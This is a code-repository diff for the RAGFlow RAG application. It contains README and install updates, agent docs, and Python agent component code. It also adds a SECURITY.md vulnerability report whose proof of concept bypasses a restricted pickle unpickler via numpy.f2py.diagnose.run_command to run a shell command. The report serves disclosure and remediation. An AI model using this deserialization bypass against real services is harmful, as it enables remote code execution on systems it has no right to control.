- 2024-06-27 支持提取出 Docx 文件中的图片。
- 2024-06-27 支持提取出 Markdown 文件中的表格。
- 2024-06-06 支持 [Self-RAG](https://huggingface.co/papers/2310.11511) ,在对话设置里面默认勾选。
- 2024-05-30 集成 [BCE](https://github.com/netease-youdao/BCEmbedding) 和 [BGE](https://github.com/FlagOpen/FlagEmbedding) 重排序模型。
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
- 2024-05-15 集成大模型 OpenAI GPT-4o。
## 🌟 主要功能
@ -47,7 +78,7 @@
### 🍔 **兼容各类异构数据源**
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据, 网页等。
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据网页等。
### 🛀 **全程无忧、自动化的 RAG 工作流**
@ -56,17 +87,6 @@
- 基于多路召回、融合重排序。
- 提供易用的 API可以轻松集成到各类企业系统。
## 📌 新增功能
- 2024-05-08 集成大模型 DeepSeek
- 2024-04-26 增添了'文件管理'功能.
- 2024-04-19 支持对话 API ([更多](./docs/conversation_api.md)).
- 2024-04-16 集成嵌入模型 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) 和 专为轻型和高速嵌入而设计的 [FastEmbed](https://github.com/qdrant/fastembed) 。
- 2024-04-11 支持用 [Xinference](./docs/xinference.md) 本地化部署大模型。
- 2024-04-10 为Laws版面分析增加了底层模型。
- 2024-04-08 支持用 [Ollama](./docs/ollama.md) 本地化部署大模型。
- 2024-04-07 支持中文界面。
## 🔎 系统架构
<div align="center" style="margin-top:20px;margin-bottom:20px;">
@ -85,7 +105,7 @@
### 🚀 启动服务器
1. 确保 `vm.max_map_count` 不小于 262144 【[更多](./docs/max_map_count.md)】
1. 确保 `vm.max_map_count` 不小于 262144
> 如需确认 `vm.max_map_count` 的大小:
>
@ -120,7 +140,7 @@
$ docker compose -f docker-compose-CN.yml up -d
```
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.5.0,然后运行上述命令。
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.9.0,然后运行上述命令。
> 核心镜像文件大约 9 GB可能需要一定时间拉取。请耐心等待。
@ -151,7 +171,7 @@
> 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80
6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
> 详见 [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md)。
> 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
_好戏开始接着奏乐接着舞_
@ -182,7 +202,7 @@
```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
$ docker build -t infiniflow/ragflow:v0.5.0 .
$ docker build -t infiniflow/ragflow:v0.9.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
@ -247,10 +267,34 @@ $ docker compose -f docker-compose-base.yml up -d
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```
7. 启动WebUI服务
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# 修改proxy.target为http://127.0.0.1:9380
$ npm run dev
```
8. 部署WebUI服务
```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ umi build
$ mkdir -p /ragflow/web
$ cp -r dist /ragflow/web
$ apt install nginx -y
$ cp ../docker/nginx/proxy.conf /etc/nginx
$ cp ../docker/nginx/nginx.conf /etc/nginx
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
$ systemctl start nginx
```
## 📚 技术文档
- [FAQ](./docs/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)
## 📜 路线图
@ -260,10 +304,15 @@ $ bash ./entrypoint.sh
- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
## 🙌 贡献指南
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) 。
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](./docs/references/CONTRIBUTING.md) 。
## 🤝 商务合作
- [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
## 👥 加入社区

74
SECURITY.md Normal file
View File

@ -0,0 +1,74 @@
# Security Policy
## Supported Versions
Use this section to tell people about which versions of your project are
currently being supported with security updates.
| Version | Supported |
| ------- | ------------------ |
| <=0.7.0 | :white_check_mark: |
## Reporting a Vulnerability
### Branch name
main
### Actual behavior
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
### Steps to reproduce
**ragflow_patch.py**
```py
import builtins
import io
import pickle
safe_module = {
'numpy',
'rag_flow'
}
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
import importlib
if module.split('.')[0] in safe_module:
_module = importlib.import_module(module)
return getattr(_module, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))
def restricted_loads(src):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(src)).load()
```
Then, **PoC.py**
```py
import pickle
from ragflow_patch import restricted_loads
class Exploit:
def __reduce__(self):
import numpy.f2py.diagnose
return numpy.f2py.diagnose.run_command, ('whoami', )
Payload=pickle.dumps(Exploit())
restricted_loads(Payload)
```
**Result**
![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
### Additional information
#### How to prevent?
Strictly filter the module and name before calling with getattr function.

45
agent/README.md Normal file
View File

@ -0,0 +1,45 @@
English | [简体中文](./README_zh.md)
# *Graph*
## Introduction
*Graph* is a mathematical concept which is composed of nodes and edges.
It is used to compose a complex work flow or agent.
And this graph is beyond the DAG that we can use circles to describe our agent or work flow.
Under this folder, we propose a test tool ./test/client.py which can test the DSLs such as json files in folder ./test/dsl_examples.
Please use this client at the same folder you start RAGFlow. If it's run by Docker, please go into the container before running the client.
Otherwise, correct configurations in conf/service_conf.yaml is essential.
```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m
options:
-h, --help show this help message and exit
-s DSL, --dsl DSL input dsl
-t TENANT_ID, --tenant_id TENANT_ID
Tenant ID
-m, --stream Stream output
```
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
</div>
## How to gain a TENANT_ID in command line?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 We plan to display it here in the near future.
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>
## How to set 'kb_ids' for component 'Retrieval' in DSL?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>

46
agent/README_zh.md Normal file
View File

@ -0,0 +1,46 @@
[English](./README.md) | 简体中文
# *Graph*
## 简介
"Graph"是一个由节点和边组成的数学概念。
它被用来构建复杂的工作流或代理。
这个图超越了有向无环图DAG我们可以使用循环来描述我们的代理或工作流。
在这个文件夹下,我们提出了一个测试工具 ./test/client.py
它可以测试像文件夹./test/dsl_examples下一样的DSL文件。
请在启动 RAGFlow 的同一文件夹中使用此客户端。如果它是通过 Docker 运行的,请在运行客户端之前进入容器。
否则,正确配置 conf/service_conf.yaml 文件是必不可少的。
```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m
options:
-h, --help show this help message and exit
-s DSL, --dsl DSL input dsl
-t TENANT_ID, --tenant_id TENANT_ID
Tenant ID
-m, --stream Stream output
```
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
</div>
## 命令行中的TENANT_ID如何获得?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 后面会展示在这里:
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>
## DSL里面的Retrieval组件的kb_ids怎么填?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>

0
agent/__init__.py Normal file
View File

302
agent/canvas.py Normal file
View File

@ -0,0 +1,302 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import importlib
import json
import traceback
from abc import ABC
from copy import deepcopy
from functools import partial
import pandas as pd
from agent.component import component_class
from agent.component.base import ComponentBase
from agent.settings import flow_logger, DEBUG
class Canvas(ABC):
"""
dsl = {
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {},
},
"downstream": ["answer_0"],
"upstream": [],
},
"answer_0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval_0"],
"upstream": ["begin", "generate_0"],
},
"retrieval_0": {
"obj": {
"component_name": "Retrieval",
"params": {}
},
"downstream": ["generate_0"],
"upstream": ["answer_0"],
},
"generate_0": {
"obj": {
"component_name": "Generate",
"params": {}
},
"downstream": ["answer_0"],
"upstream": ["retrieval_0"],
}
},
"history": [],
"messages": [],
"reference": [],
"path": [["begin"]],
"answer": []
}
"""
def __init__(self, dsl: str, tenant_id=None):
self.path = []
self.history = []
self.messages = []
self.answer = []
self.components = {}
self.dsl = json.loads(dsl) if dsl else {
"components": {
"begin": {
"obj": {
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": [],
"upstream": []
}
},
"history": [],
"messages": [],
"reference": [],
"path": [],
"answer": []
}
self._tenant_id = tenant_id
self._embed_id = ""
self.load()
def load(self):
self.components = self.dsl["components"]
cpn_nms = set([])
for k, cpn in self.components.items():
cpn_nms.add(cpn["obj"]["component_name"])
assert "Begin" in cpn_nms, "There have to be an 'Begin' component."
assert "Answer" in cpn_nms, "There have to be an 'Answer' component."
for k, cpn in self.components.items():
cpn_nms.add(cpn["obj"]["component_name"])
param = component_class(cpn["obj"]["component_name"] + "Param")()
param.update(cpn["obj"]["params"])
param.check()
cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
if cpn["obj"].component_name == "Categorize":
for _, desc in param.category_description.items():
if desc["to"] not in cpn["downstream"]:
cpn["downstream"].append(desc["to"])
self.path = self.dsl["path"]
self.history = self.dsl["history"]
self.messages = self.dsl["messages"]
self.answer = self.dsl["answer"]
self.reference = self.dsl["reference"]
self._embed_id = self.dsl.get("embed_id", "")
def __str__(self):
self.dsl["path"] = self.path
self.dsl["history"] = self.history
self.dsl["messages"] = self.messages
self.dsl["answer"] = self.answer
self.dsl["reference"] = self.reference
self.dsl["embed_id"] = self._embed_id
dsl = {
"components": {}
}
for k in self.dsl.keys():
if k in ["components"]:continue
dsl[k] = deepcopy(self.dsl[k])
for k, cpn in self.components.items():
if k not in dsl["components"]:
dsl["components"][k] = {}
for c in cpn.keys():
if c == "obj":
dsl["components"][k][c] = json.loads(str(cpn["obj"]))
continue
dsl["components"][k][c] = deepcopy(cpn[c])
return json.dumps(dsl, ensure_ascii=False)
def reset(self):
self.path = []
self.history = []
self.messages = []
self.answer = []
self.reference = []
for k, cpn in self.components.items():
self.components[k]["obj"].reset()
self._embed_id = ""
def run(self, **kwargs):
ans = ""
if self.answer:
cpn_id = self.answer[0]
self.answer.pop(0)
try:
ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
except Exception as e:
ans = ComponentBase.be_output(str(e))
self.path[-1].append(cpn_id)
if kwargs.get("stream"):
assert isinstance(ans, partial)
return ans
self.history.append(("assistant", ans.to_dict("records")))
return ans
if not self.path:
self.components["begin"]["obj"].run(self.history, **kwargs)
self.path.append(["begin"])
self.path.append([])
ran = -1
def prepare2run(cpns):
nonlocal ran, ans
for c in cpns:
if self.path[-1] and c == self.path[-1][-1]: continue
cpn = self.components[c]["obj"]
if cpn.component_name == "Answer":
self.answer.append(c)
else:
if DEBUG: print("RUN: ", c)
if cpn.component_name == "Generate":
cpids = cpn.get_dependent_components()
if any([c not in self.path[-1] for c in cpids]):
continue
ans = cpn.run(self.history, **kwargs)
self.path[-1].append(c)
ran += 1
prepare2run(self.components[self.path[-2][-1]]["downstream"])
while 0 <= ran < len(self.path[-1]):
if DEBUG: print(ran, self.path)
cpn_id = self.path[-1][ran]
cpn = self.get_component(cpn_id)
if not cpn["downstream"]: break
loop = self._find_loop()
if loop: raise OverflowError(f"Too much loops: {loop}")
if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
switch_out = cpn["obj"].output()[1].iloc[0, 0]
assert switch_out in self.components, \
"{}'s output: {} not valid.".format(cpn_id, switch_out)
try:
prepare2run([switch_out])
except Exception as e:
for p in [c for p in self.path for c in p][::-1]:
if p.lower().find("answer") >= 0:
self.get_component(p)["obj"].set_exception(e)
prepare2run([p])
break
traceback.print_exc()
break
continue
try:
prepare2run(cpn["downstream"])
except Exception as e:
for p in [c for p in self.path for c in p][::-1]:
if p.lower().find("answer") >= 0:
self.get_component(p)["obj"].set_exception(e)
prepare2run([p])
break
traceback.print_exc()
break
if self.answer:
cpn_id = self.answer[0]
self.answer.pop(0)
ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
self.path[-1].append(cpn_id)
if kwargs.get("stream"):
assert isinstance(ans, partial)
return ans
self.history.append(("assistant", ans.to_dict("records")))
return ans
def get_component(self, cpn_id):
return self.components[cpn_id]
def get_tenant_id(self):
return self._tenant_id
def get_history(self, window_size):
convs = []
for role, obj in self.history[window_size * -2:]:
convs.append({"role": role, "content": (obj if role == "user" else
'\n'.join(pd.DataFrame(obj)['content']))})
return convs
def add_user_input(self, question):
self.history.append(("user", question))
def set_embedding_model(self, embed_id):
self._embed_id = embed_id
def get_embedding_model(self):
return self._embed_id
def _find_loop(self, max_loops=2):
path = self.path[-1][::-1]
if len(path) < 2: return False
for i in range(len(path)):
if path[i].lower().find("answer") >= 0:
path = path[:i]
break
if len(path) < 2: return False
for l in range(2, len(path) // 2):
pat = ",".join(path[0:l])
path_str = ",".join(path)
if len(pat) >= len(path_str): return False
loop = max_loops
while path_str.find(pat) == 0 and loop >= 0:
loop -= 1
if len(pat)+1 >= len(path_str):
return False
path_str = path_str[len(pat)+1:]
if loop < 0:
pat = " => ".join([p.split(":")[0] for p in path[0:l]])
return pat + " => " + pat
return False

View File

@ -0,0 +1,25 @@
import importlib
from .begin import Begin, BeginParam
from .generate import Generate, GenerateParam
from .retrieval import Retrieval, RetrievalParam
from .answer import Answer, AnswerParam
from .categorize import Categorize, CategorizeParam
from .switch import Switch, SwitchParam
from .relevant import Relevant, RelevantParam
from .message import Message, MessageParam
from .rewrite import RewriteQuestion, RewriteQuestionParam
from .keyword import KeywordExtract, KeywordExtractParam
from .baidu import Baidu, BaiduParam
from .duckduckgo import DuckDuckGo, DuckDuckGoParam
from .wikipedia import Wikipedia, WikipediaParam
from .pubmed import PubMed, PubMedParam
from .arxiv import ArXiv, ArXivParam
from .google import Google, GoogleParam
from .bing import Bing, BingParam
from .googlescholar import GoogleScholar, GoogleScholarParam
def component_class(class_name):
m = importlib.import_module("graph.component")
c = getattr(m, class_name)
return c

79
agent/component/answer.py Normal file
View File

@ -0,0 +1,79 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase
class AnswerParam(ComponentParamBase):
"""
Define the Answer component parameters.
"""
def __init__(self):
super().__init__()
self.post_answers = []
def check(self):
return True
class Answer(ComponentBase, ABC):
component_name = "Answer"
def _run(self, history, **kwargs):
if kwargs.get("stream"):
return partial(self.stream_output)
ans = self.get_input()
if self._param.post_answers:
ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])], ignore_index=False)
return ans
def stream_output(self):
res = None
if hasattr(self, "exception") and self.exception:
res = {"content": str(self.exception)}
self.exception = None
yield res
self.set_output(res)
return
stream = self.get_stream_input()
if isinstance(stream, pd.DataFrame):
res = stream
answer = ""
for ii, row in stream.iterrows():
answer += row.to_dict()["content"]
yield {"content": answer}
else:
for st in stream():
res = st
yield st
if self._param.post_answers:
res["content"] += random.choice(self._param.post_answers)
yield res
self.set_output(res)
def set_exception(self, e):
self.exception = e

69
agent/component/arxiv.py Normal file
View File

@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import arxiv
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class ArXivParam(ComponentParamBase):
"""
Define the ArXiv component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 6
self.sort_by = 'submittedDate'
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
['submittedDate', 'lastUpdatedDate', 'relevance'])
class ArXiv(ComponentBase, ABC):
component_name = "ArXiv"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return ArXiv.be_output("")
try:
sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
"lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
'submittedDate': arxiv.SortCriterion.SubmittedDate}
arxiv_client = arxiv.Client()
search = arxiv.Search(
query=ans,
max_results=self._param.top_n,
sort_by=sort_choices[self._param.sort_by]
)
arxiv_res = [
{"content": 'Title: ' + i.title + '\nPdf_Url: <a href="' + i.pdf_url + '"></a> \nSummary: ' + i.summary} for
i in list(arxiv_client.results(search))]
except Exception as e:
return ArXiv.be_output("**ERROR**: " + str(e))
if not arxiv_res:
return ArXiv.be_output("")
df = pd.DataFrame(arxiv_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

69
agent/component/baidu.py Normal file
View File

@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import pandas as pd
import requests
import re
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class BaiduParam(ComponentParamBase):
"""
Define the Baidu component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 10
def check(self):
self.check_positive_integer(self.top_n, "Top N")
class Baidu(ComponentBase, ABC):
component_name = "Baidu"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Baidu.be_output("")
try:
url = 'https://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
response = requests.get(url=url, headers=headers)
url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
baidu_res = [{"content": re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body)} for
url, title, body in zip(url_res, title_res, body_res)]
del body_res, url_res, title_res
except Exception as e:
return Baidu.be_output("**ERROR**: " + str(e))
if not baidu_res:
return Baidu.be_output("")
df = pd.DataFrame(baidu_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

494
agent/component/base.py Normal file
View File

@ -0,0 +1,494 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import builtins
import json
import os
from copy import deepcopy
from functools import partial
from typing import List, Dict, Tuple, Union
import pandas as pd
from agent import settings
from agent.settings import flow_logger, DEBUG
_FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
_DEPRECATED_PARAMS = "_deprecated_params"
_USER_FEEDED_PARAMS = "_user_feeded_params"
_IS_RAW_CONF = "_is_raw_conf"
class ComponentParamBase(ABC):
def __init__(self):
self.output_var_name = "output"
self.message_history_window_size = 22
def set_name(self, name: str):
self._name = name
return self
def check(self):
raise NotImplementedError("Parameter Object should be checked.")
@classmethod
def _get_or_init_deprecated_params_set(cls):
if not hasattr(cls, _DEPRECATED_PARAMS):
setattr(cls, _DEPRECATED_PARAMS, set())
return getattr(cls, _DEPRECATED_PARAMS)
def _get_or_init_feeded_deprecated_params_set(self, conf=None):
if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
if conf is None:
setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
else:
setattr(
self,
_FEEDED_DEPRECATED_PARAMS,
set(conf[_FEEDED_DEPRECATED_PARAMS]),
)
return getattr(self, _FEEDED_DEPRECATED_PARAMS)
def _get_or_init_user_feeded_params_set(self, conf=None):
if not hasattr(self, _USER_FEEDED_PARAMS):
if conf is None:
setattr(self, _USER_FEEDED_PARAMS, set())
else:
setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
return getattr(self, _USER_FEEDED_PARAMS)
def get_user_feeded(self):
return self._get_or_init_user_feeded_params_set()
def get_feeded_deprecated_params(self):
return self._get_or_init_feeded_deprecated_params_set()
@property
def _deprecated_params_set(self):
return {name: True for name in self.get_feeded_deprecated_params()}
def __str__(self):
return json.dumps(self.as_dict(), ensure_ascii=False)
def as_dict(self):
def _recursive_convert_obj_to_dict(obj):
ret_dict = {}
for attr_name in list(obj.__dict__):
if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
continue
# get attr
attr = getattr(obj, attr_name)
if isinstance(attr, pd.DataFrame):
ret_dict[attr_name] = attr.to_dict()
continue
if attr and type(attr).__name__ not in dir(builtins):
ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
else:
ret_dict[attr_name] = attr
return ret_dict
return _recursive_convert_obj_to_dict(self)
def update(self, conf, allow_redundant=False):
update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
if update_from_raw_conf:
deprecated_params_set = self._get_or_init_deprecated_params_set()
feeded_deprecated_params_set = (
self._get_or_init_feeded_deprecated_params_set()
)
user_feeded_params_set = self._get_or_init_user_feeded_params_set()
setattr(self, _IS_RAW_CONF, False)
else:
feeded_deprecated_params_set = (
self._get_or_init_feeded_deprecated_params_set(conf)
)
user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)
def _recursive_update_param(param, config, depth, prefix):
if depth > settings.PARAM_MAXDEPTH:
raise ValueError("Param define nesting too deep!!!, can not parse it")
inst_variables = param.__dict__
redundant_attrs = []
for config_key, config_value in config.items():
# redundant attr
if config_key not in inst_variables:
if not update_from_raw_conf and config_key.startswith("_"):
setattr(param, config_key, config_value)
else:
setattr(param, config_key, config_value)
# redundant_attrs.append(config_key)
continue
full_config_key = f"{prefix}{config_key}"
if update_from_raw_conf:
# add user feeded params
user_feeded_params_set.add(full_config_key)
# update user feeded deprecated param set
if full_config_key in deprecated_params_set:
feeded_deprecated_params_set.add(full_config_key)
# supported attr
attr = getattr(param, config_key)
if type(attr).__name__ in dir(builtins) or attr is None:
setattr(param, config_key, config_value)
else:
# recursive set obj attr
sub_params = _recursive_update_param(
attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
)
setattr(param, config_key, sub_params)
if not allow_redundant and redundant_attrs:
raise ValueError(
f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
)
return param
return _recursive_update_param(param=self, config=conf, depth=0, prefix="")
def extract_not_builtin(self):
def _get_not_builtin_types(obj):
ret_dict = {}
for variable in obj.__dict__:
attr = getattr(obj, variable)
if attr and type(attr).__name__ not in dir(builtins):
ret_dict[variable] = _get_not_builtin_types(attr)
return ret_dict
return _get_not_builtin_types(self)
def validate(self):
self.builtin_types = dir(builtins)
self.func = {
"ge": self._greater_equal_than,
"le": self._less_equal_than,
"in": self._in,
"not_in": self._not_in,
"range": self._range,
}
home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
param_validation_path_prefix = home_dir + "/param_validation/"
param_name = type(self).__name__
param_validation_path = "/".join(
[param_validation_path_prefix, param_name + ".json"]
)
validation_json = None
try:
with open(param_validation_path, "r") as fin:
validation_json = json.loads(fin.read())
except BaseException:
return
self._validate_param(self, validation_json)
def _validate_param(self, param_obj, validation_json):
default_section = type(param_obj).__name__
var_list = param_obj.__dict__
for variable in var_list:
attr = getattr(param_obj, variable)
if type(attr).__name__ in self.builtin_types or attr is None:
if variable not in validation_json:
continue
validation_dict = validation_json[default_section][variable]
value = getattr(param_obj, variable)
value_legal = False
for op_type in validation_dict:
if self.func[op_type](value, validation_dict[op_type]):
value_legal = True
break
if not value_legal:
raise ValueError(
"Plase check runtime conf, {} = {} does not match user-parameter restriction".format(
variable, value
)
)
elif variable in validation_json:
self._validate_param(attr, validation_json)
@staticmethod
def check_string(param, descr):
if type(param).__name__ not in ["str"]:
raise ValueError(
descr + " {} not supported, should be string type".format(param)
)
@staticmethod
def check_empty(param, descr):
if not param:
raise ValueError(
descr + " does not support empty value."
)
@staticmethod
def check_positive_integer(param, descr):
if type(param).__name__ not in ["int", "long"] or param <= 0:
raise ValueError(
descr + " {} not supported, should be positive integer".format(param)
)
@staticmethod
def check_positive_number(param, descr):
if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
raise ValueError(
descr + " {} not supported, should be positive numeric".format(param)
)
@staticmethod
def check_nonnegative_number(param, descr):
if type(param).__name__ not in ["float", "int", "long"] or param < 0:
raise ValueError(
descr
+ " {} not supported, should be non-negative numeric".format(param)
)
@staticmethod
def check_decimal_float(param, descr):
if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
raise ValueError(
descr
+ " {} not supported, should be a float number in range [0, 1]".format(
param
)
)
@staticmethod
def check_boolean(param, descr):
if type(param).__name__ != "bool":
raise ValueError(
descr + " {} not supported, should be bool type".format(param)
)
@staticmethod
def check_open_unit_interval(param, descr):
if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
raise ValueError(
descr + " should be a numeric number between 0 and 1 exclusively"
)
